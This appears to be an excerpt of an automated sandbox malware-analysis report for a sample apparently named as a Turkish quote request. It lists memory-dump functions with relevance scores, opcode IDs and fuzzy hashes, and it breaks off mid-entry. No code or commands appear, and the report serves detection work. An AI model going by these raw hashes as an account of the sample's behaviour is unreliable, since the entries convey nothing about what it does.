                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0208fe47cc939487a91405f95aaff3ae1ac330a7fe40b68621110de5bdff3e46
                                                                                                              • Instruction ID: 33d5d3e0a69ba7dd5d5c8218fe96eab842360d7bfa34ae63b7106f78a93cbd34
                                                                                                              • Opcode Fuzzy Hash: 0208fe47cc939487a91405f95aaff3ae1ac330a7fe40b68621110de5bdff3e46
                                                                                                              • Instruction Fuzzy Hash: 3B515D71600A05EFDB2AEF69C980FAAB7F9FF14784F4005E9E65297660D734E940CB50
                                                                                                              Function 01BE4180 Relevance: .2, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a654724f8c9a488b54283c35e8f0db4e25ffe8284dcdd6113f703f3cf8dff5c8
                                                                                                              • Instruction ID: 00244acfa86a55561dc46aed30ebdc913e6db441a4eac40a2b723b7750620143
                                                                                                              • Opcode Fuzzy Hash: a654724f8c9a488b54283c35e8f0db4e25ffe8284dcdd6113f703f3cf8dff5c8
                                                                                                              • Instruction Fuzzy Hash: F25143716083028FD758DF29C884A6BBBE5FBC8608F444AAEF599C7250EB30D905CB56
                                                                                                              Function 01B645B1 Relevance: .2, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction ID: fc7f6b6fd80546604cca06365f6baf26ca35d30d681eed0f8716ab245a3a33d9
                                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction Fuzzy Hash: A251AD71E0460AABDF19DF98C440BFEBBB9EF55350F0441A9EA11AB240D738DD44CBA0
                                                                                                              Function 01BCE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction ID: 28a9d55ec1cfe9513087df30202084410dd52c65273db0f0f1c665f8c3d88a44
                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction Fuzzy Hash: E951647190021AEFDF299A94C8C4BBEBF75EB00A14F1546DDA612A7190D774DD40CBA0
                                                                                                              Function 01C08B28 Relevance: .2, Instructions: 152COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 39dd68a06d7e2df251d6f65bc5263ddaec05870612ba3dd60551d25475ebea14
                                                                                                              • Instruction ID: 92f6f9a5a461e6f5e42b60b27123f184dff25c72b32040267a47443367e159b6
                                                                                                              • Opcode Fuzzy Hash: 39dd68a06d7e2df251d6f65bc5263ddaec05870612ba3dd60551d25475ebea14
                                                                                                              • Instruction Fuzzy Hash: 9C41F670B01A11DBDB2BDB2DCC94B7BBBAAEF90620F04C219F915876C1DB34D901C691
                                                                                                              Function 01BCCBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d409381c3af0f293c3ce8a5f4b695e8bcba82749b6e826d0e15dd065cba4e7cf
                                                                                                              • Instruction ID: a283a3b40cfe27000bb83b99e65fbd250b21e0a3ac4b876e4da565b2df8c4ad4
                                                                                                              • Opcode Fuzzy Hash: d409381c3af0f293c3ce8a5f4b695e8bcba82749b6e826d0e15dd065cba4e7cf
                                                                                                              • Instruction Fuzzy Hash: CC51AF71900216EFCB28DFA9C480A9EBFB9FF68754B144599D54AA7300D730EE41CBD0
                                                                                                              Function 01B7A430 Relevance: .1, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 68fbe8ca0c9a2ff49a1d7260131e454a13609526d4a28f6587661587c7b6c95f
                                                                                                              • Instruction ID: 24a98cdd940bcbb12dcab78ea7b8f07a27ffbaf3b1866098e1b5d42b03d6582f
                                                                                                              • Opcode Fuzzy Hash: 68fbe8ca0c9a2ff49a1d7260131e454a13609526d4a28f6587661587c7b6c95f
                                                                                                              • Instruction Fuzzy Hash: 6E41B071741602ABDF6DAF6998C1BBE7765EB65708F0500ACFE13AB245D7F2D80087A0
                                                                                                              Function 01C0A9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction ID: 916fe4f1e27c78b66ffc987cab33afd87dbf69586cc039cf1de4101d774c10cd
                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction Fuzzy Hash: 9D41FC32605716DFDB2ACF58C981A6AB7A9FF80314B05466DEA12876C0EB30ED54CBD0
                                                                                                              Function 01B701F8 Relevance: .1, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d51b2d3417251ff3a80d9aa8f542435dd83072052b1cff1cc7a325cfb496af9
                                                                                                              • Instruction ID: 8cd91dea8f9b1b0641099c698b0d47ccc0de1e2b3665a9582ae4163af1bfe154
                                                                                                              • Opcode Fuzzy Hash: 6d51b2d3417251ff3a80d9aa8f542435dd83072052b1cff1cc7a325cfb496af9
                                                                                                              • Instruction Fuzzy Hash: C241CD369002159BDF18EF98C480AEEB7B4FF5A700F1582ABF825E7240D7349C01CBA4
                                                                                                              Function 01B6EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 06aeb3cf991959c658f39d8bea240ceab29eba6943e1e882f4f304c6d871374e
                                                                                                              • Instruction ID: 795f6016d7ab4e92bef563d7a2b2d3c97c4fcbdc36e418aa48475ab1a4a886a6
                                                                                                              • Opcode Fuzzy Hash: 06aeb3cf991959c658f39d8bea240ceab29eba6943e1e882f4f304c6d871374e
                                                                                                              • Instruction Fuzzy Hash: C341D6752043019FDB29DF28C880A6BBBF9FFA4214F0049ADEA57C7615DB35E844CB90
                                                                                                              Function 01B82750 Relevance: .1, Instructions: 137COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction ID: 33b61d82bebedae27adacea6922b2cbd500d7fde64c5dfdbf14fe1b613cf5ee2
                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction Fuzzy Hash: DA515735E002199FCB19CFA9C5C0AAEF7B2FF84710F2481A9D915A7751D7B4AE42CB90
                                                                                                              Function 01B46154 Relevance: .1, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84bceb4e75646ca2428b6864633d5ba199a5d6b7caeef5b7e35e4e0d94e7728f
                                                                                                              • Instruction ID: a78972fe6b4e47a20563f19cc5124dca19546404d8f780f29d9e2c8c38b185ce
                                                                                                              • Opcode Fuzzy Hash: 84bceb4e75646ca2428b6864633d5ba199a5d6b7caeef5b7e35e4e0d94e7728f
                                                                                                              • Instruction Fuzzy Hash: 1F51D570904216EBDF2DDF68CC00BA8BBB1EF16314F1482E9E529A72D1E7349981DF81
                                                                                                              Function 01B40BCD Relevance: .1, Instructions: 130COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d40fd6fad13700e781f7e6c5ee8fe86027fb72de203a7fb3d18af498fbfae322
                                                                                                              • Instruction ID: 0af9746c9fc0d69425d11991cd33f917f168074b55281c4cc93748ef3d0dbc2b
                                                                                                              • Opcode Fuzzy Hash: d40fd6fad13700e781f7e6c5ee8fe86027fb72de203a7fb3d18af498fbfae322
                                                                                                              • Instruction Fuzzy Hash: 23418131A00229DBDF29EF68C940BEA77B8EF55740F0140E5EA09AB242D774DE81CB95
                                                                                                              Function 01C0866E Relevance: .1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                              • Instruction ID: 263e013e3c8f785956663fa4f591f66390493ca536dc66531208cf4c2769aa09
                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                              • Instruction Fuzzy Hash: 34419675F00215EBDF16DF99CC84AAFBBBAAF84600F158069E50597385DB74DE00CB60
                                                                                                              Function 01B40887 Relevance: .1, Instructions: 128COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd71f7ef81d6b00849303d5a3fe74271e80b35e78ed1fc88681e378d95cc8850
                                                                                                              • Instruction ID: 610bd5731a4594512a7f44d49dc753ba059ca9c8ac208580ad83daa7310019fb
                                                                                                              • Opcode Fuzzy Hash: dd71f7ef81d6b00849303d5a3fe74271e80b35e78ed1fc88681e378d95cc8850
                                                                                                              • Instruction Fuzzy Hash: 7341D1716007029FE729EF2CC580A62BBF5FF49314B108AADE64787A50E730E845DB90
                                                                                                              Function 01B6A470 Relevance: .1, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6259b64f605d399f355dc43e733995d6b396347958a1c39182f8bcf4c5fa22f
                                                                                                              • Instruction ID: 8f44a2f87387679843dfa72ba91640c7197b2f9538cce4b2f4ba638c717e1336
                                                                                                              • Opcode Fuzzy Hash: e6259b64f605d399f355dc43e733995d6b396347958a1c39182f8bcf4c5fa22f
                                                                                                              • Instruction Fuzzy Hash: 4B418932944215CFDF29DF68C8947AD7BB8FB28350F4802E5D412BB295DB38E900CBA4
                                                                                                              Function 01B48BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0fb7a168a77b95c8700008841721d17724e53e72fb97ee6097ae9969324c38f
                                                                                                              • Instruction ID: 5418a6b747277acedc9e4231d0e062c620365f0489ce16cd9bbf908a63730657
                                                                                                              • Opcode Fuzzy Hash: c0fb7a168a77b95c8700008841721d17724e53e72fb97ee6097ae9969324c38f
                                                                                                              • Instruction Fuzzy Hash: 4841E531A05202CFDB2DDF98C880B5EBBB6FBA9704F18C1ADD9015B256C775D842DB90
                                                                                                              Function 01B38918 Relevance: .1, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2f3bf5fa356a3ebd7c319fb82bca25b2ed0f32ca7db96c46674ef784e5718f35
                                                                                                              • Instruction ID: e9bce5fdc882a74cc135deca145f6fb071059db4c2cc579672e70970de5eea13
                                                                                                              • Opcode Fuzzy Hash: 2f3bf5fa356a3ebd7c319fb82bca25b2ed0f32ca7db96c46674ef784e5718f35
                                                                                                              • Instruction Fuzzy Hash: D5418C315083069FDB16DF68D940A6BB7E8EF84B94F400A6EF980D7250E734DE158B93
                                                                                                              Function 01B3A020 Relevance: .1, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction ID: 7a1c823f3b237236263dad866ddb75b2de18f6a6000d23adcc3f0e5560d39150
                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction Fuzzy Hash: 41414931A00211DBEF2DEE799584BBAFB61EBD4750F2580FAE984CB241D7329D51CB90
                                                                                                              Function 01B409AD Relevance: .1, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b1dfd42e1c84e4d4b447901d5e2eeab9be88818eb1ad2b522a1254000f9e166f
                                                                                                              • Instruction ID: 677f331dff84623258b1ee08563e530c94bb46932274b6a9bb24c1b3de1d3a15
                                                                                                              • Opcode Fuzzy Hash: b1dfd42e1c84e4d4b447901d5e2eeab9be88818eb1ad2b522a1254000f9e166f
                                                                                                              • Instruction Fuzzy Hash: DB416A71600701EFD729DF18D840B66BBF4FF58314F24CAAAEA498B251E771E942DB90
                                                                                                              Function 01B70710 Relevance: .1, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction ID: c7a7e534d6960c8887983bea7f84ccd64f7071bee1dbafc4b11fef5850811356
                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction Fuzzy Hash: FE410A71A00705EFDB69DF98C980AAABBF4FF19700B1049AEE566D7691D330EA44CF50
                                                                                                              Function 01B4262C Relevance: .1, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c3ae460186e72e6d1aca0d40a78afe086bcce7d4ac0788f57908ff234c9a6d2
                                                                                                              • Instruction ID: 369c1cbe1949cbc36730ca5e0b0118cbfec405f306bedbad9f88fea5f4bcba7c
                                                                                                              • Opcode Fuzzy Hash: 3c3ae460186e72e6d1aca0d40a78afe086bcce7d4ac0788f57908ff234c9a6d2
                                                                                                              • Instruction Fuzzy Hash: CB41B0B0901711DFCB2AEF29E900765B7B1FF99310F10C2E9E5169B2A1DB30E941EB51
                                                                                                              Function 01B7C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7061120314db7a448c6871eac04e1e56d3a3d0c49be1667b0a399856d8233e1
                                                                                                              • Instruction ID: 7a352857b53050e30ea6c01314e3519199277e797e201bd14b9befcb305628ca
                                                                                                              • Opcode Fuzzy Hash: a7061120314db7a448c6871eac04e1e56d3a3d0c49be1667b0a399856d8233e1
                                                                                                              • Instruction Fuzzy Hash: C63179B1A40646DFDB5ACF98C040799BBF4EB09714F2085AED119EB251D776D902CF90
                                                                                                              Function 01BC07C3 Relevance: .1, Instructions: 114COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a595312852b5d44fa26839ebeb2815b9b8ab7e7ea56d09088a33d4a3f7bd55c5
                                                                                                              • Instruction ID: f1bfd05c7cbde1f7ac01726180c3462b6004dafa79165c8f4acf627aad32f542
                                                                                                              • Opcode Fuzzy Hash: a595312852b5d44fa26839ebeb2815b9b8ab7e7ea56d09088a33d4a3f7bd55c5
                                                                                                              • Instruction Fuzzy Hash: C2418C71508311ABD724EF29C845B9BBBE8FF98A14F008A6EF598D7290D770D904CB92
                                                                                                              Function 01BC05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5e0909c695234ecf99782dd7314f7f0a146215090d0bb7e433a0f42404f4989f
                                                                                                              • Instruction ID: e6934e59deb9233efb7a32c9b115f9a64fbaa6687381b620c52e31de56fa9586
                                                                                                              • Opcode Fuzzy Hash: 5e0909c695234ecf99782dd7314f7f0a146215090d0bb7e433a0f42404f4989f
                                                                                                              • Instruction Fuzzy Hash: E941D476604642DBC728EF68C840B6AB7E5FFC8B00F14066DF95587690E730D904C7A5
                                                                                                              Function 01B44859 Relevance: .1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6f05b7e5068711d17fdabc23f532845e5aae99ad65ec638bb0e9a27795de4b95
                                                                                                              • Instruction ID: 5a4f985709fb21aaff94791ceac9ddc69611870e2a93d3a9cff9594e0302e69e
                                                                                                              • Opcode Fuzzy Hash: 6f05b7e5068711d17fdabc23f532845e5aae99ad65ec638bb0e9a27795de4b95
                                                                                                              • Instruction Fuzzy Hash: B841D5752043028FEB29DF1CD884B26BBE5FF81354F1484ADEA468B291D730D921EB51
                                                                                                              Function 01B502E1 Relevance: .1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                              • Instruction ID: e72c0659dd8d22b35faa83612340ae3a88c4ff8423b9861c4df0ed35006a9dbd
                                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                              • Instruction Fuzzy Hash: 9D31F531A04244ABDB5AAB68CC84B9ABFE9EF18350F0482E5F855D7352D7B4D944CBA0
                                                                                                              Function 01BEE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32758d4caf24bb566dc91a438a7e2717a36962c6c6a1d378d2b8036bb7d8050e
                                                                                                              • Instruction ID: 9d51579cfce6d7fc94df30ae2ef7e10da7b19f596236fcb5bf97575292922eb0
                                                                                                              • Opcode Fuzzy Hash: 32758d4caf24bb566dc91a438a7e2717a36962c6c6a1d378d2b8036bb7d8050e
                                                                                                              • Instruction Fuzzy Hash: 2431A831750756ABDB2AAF559C45F6F76F8AF58B50F0000A8FA00AB391DBA8DD00C7A0
                                                                                                              Function 01BF4B4B Relevance: .1, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e870a87f273e391e4a7747afa2f26cb6a278291b82dad55ea0457383b99e16dd
                                                                                                              • Instruction ID: 56e7269c912da64825f8f23fcce9ab16b203a9fa00ed62be20cdef5870c4680d
                                                                                                              • Opcode Fuzzy Hash: e870a87f273e391e4a7747afa2f26cb6a278291b82dad55ea0457383b99e16dd
                                                                                                              • Instruction Fuzzy Hash: F431CF322052119FC729DF19D880F66B7F5FB84364F0A44AEEA968B352D731E908CB91
                                                                                                              Function 01B44260 Relevance: .1, Instructions: 102COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
